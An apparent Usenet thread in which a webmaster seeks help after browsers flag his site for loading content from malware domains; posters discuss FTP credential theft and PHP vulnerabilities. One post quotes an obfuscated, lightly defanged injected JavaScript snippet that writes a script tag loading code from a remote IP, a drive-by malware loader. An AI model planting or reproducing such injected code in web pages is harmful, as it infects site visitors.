Web site compromised?

Hello All:

A website I manage seems to have a problem when I tried to access it
today with Chrome browser.

Chrome gives the following warning:


"Warning: Visiting this site may harm your computer!
The website at www.XXXX.YYY (I am not giving the actual URL) contains
elements from the site beebest.cn, which appears to host malware –
software that can hurt your computer or otherwise operate without your
consent. Just visiting a site that contains malware can infect your
computer.
For detailed information about the problems with these elements, visit
the Google Safe Browsing diagnostic page for beebest.cn.
Learn more about how to protect yourself from harmful software online.
I understand that visiting this site may harm my computer. "

How can "elements" from beebest.cn can be on this site? What "do"
elements mean in this case?

I am downloading the site and will do a text search for "beebest" .

Any other recommendations?

Thanks

Deguza

 

I just had a friend try to access my website. He got the same message
except the beebest.cn was replaced by www.corpamata.cn.

What is going on?

Deguza

 

Dunno, but if it were my site I'd be looking to sack the webmaster
because he doesn't seem to know what he's doing.

Post the frigging site and you might get a descent answer from someone
who bothers to go and look at the code.

 

These guys are complaining about the same thing. However, some are
finding no problems...

http://www.greenockmorton.org/forum/index.php?showtopic=26972

Deguza

 

Hello Deguza:

I too believe we should be dealing with specifics. Please reply with
your site's true and complete URL in the form of:

<hxxp://www.xxxx.yyy/>
^^

In the meantime, you may wish to see if your application software is
updated to the latest possible versions so as to have all possible
security holes plugged. If you also manage the website's OS please post
a great deal of detail on its state of revision. It wouldn't hurt to
give us the ISP so we don't have to dig for it. Do you also maintain
its hardware?

Warm regards,

Pete

 

Kompu Kid "contributed" in alt.hacker:

Don't expect any help then.

 

No, it does not use SQL queries.

I found this in one of the pages. I have not put this in there, unless
FrontPage, or the webhosting software put it in.

Or it could be the infection (I am putting "-"s in some of the key
words just in case it tries to execute on a the web...):

<s-c-ript la-ngu-age=ja-va-script><!--
do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
%2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
%3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
ii/g,""));
--></script><body>

 

I did not want anybody getting infected, that's why I did not give it
out.

Deguza

 

PHP forums ...

I lack the time to go there and triage it, but PHP is quite a
playground, and forums even more so. Probably some sort of script
injection attack if not a complete compromise.

 

Do you have any dynamic content?
Do you run banner ads that are not on your machine but are links to another
machine?
Do you include google keyword advertising?
Do you have a link to a webring at the bottom of the webpage?

Gandalf Parker

 

UPDATE:

* I found also a My hosting services told me that an infection on my
personal computer is probably where the injection of suspect codes
have started. He says the virus on my computer used the ftp link I
have to the web hosting site.

* In addition to the script I gave earlier, I found on some pages
another piece of code that had an "iframe" html command. The iframe
was referring to a chinese site "betwager". I am not able to write the
full code and the site. Google won't let me post it.

 

It seems like I need to install a newsreader on my computer to use the
"".

Outlooked volunteered when I put that in my Chrome's address area, but
I do not want to use it.

Any recommendations for a news reader for the XP environment? If it
matters, I use Firefox in addition to chrome.

Deguza

 

Much agreed. PHP is so pourous that it's much more likely to be a
direct attack on your site rather than some convoluted "trojan on your
computer that modifies local html and then magically knows what FTP
client you're using, reuses its cached password for the site and loads
the modified html onto the remote site."

The target audience for such a client side sploit is so small it
wouldn't be worthwhile.

visit http://www.securityfocus.com/vulnerabilities

and for each of the following, chase down what vulns there are for it
for the version of each your site is running

Web server version (apache whatever likely)
php version on the server
what php forum script you're using / version


And see what vulns are in each for the versions you have, and that'll
wittle down the "how" in what happened perhaps.

 

LOL

 

Can you/will you expand on your comment, ©Ari® ?

Thanks

 

If you're posting a message in a hacker forum with a warning that you
think the site might be compromised, then the people who look at it are
forewarned.

Not posting the URL is stupid. People who can do low-tech stuff like
telnet to the server and download the page for analysis can't do that if
they don't know where it is.

It's like telling someone you think you have an STD, but not going to the
doctor to really find out.



Doc.

 

I still like X-News.

http://download.cnet.com/Xnews/3000-2164_4-10026377.html

Really should download and try the latest version, but the one I have just
works - no attempts to execute code or render pages, so very safe.


Doc.

 

Kompu Kid "contributed" in alt.hacker:

I'll second Doc.

Most of the regulars here know what they're doing. FYI, my system will
not get infected by just browsing to a compromised website.

 

Hello John

Please will you explain how/why *your* system will not be so infected
yet other folk may be?

Might it simply be because you aren't using Microsoft Windows?

 

~BD~ "contributed" in alt.hacker:

As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
2008 DC's running ISA server and Forefront. That setup keeps my local
network free of mal/spy-ware, viruses and other nasties. The servers are
really in use as servers, i.e. nobody touches them but me and no websites
are ever visited on them.

I hope my answer satisfied you.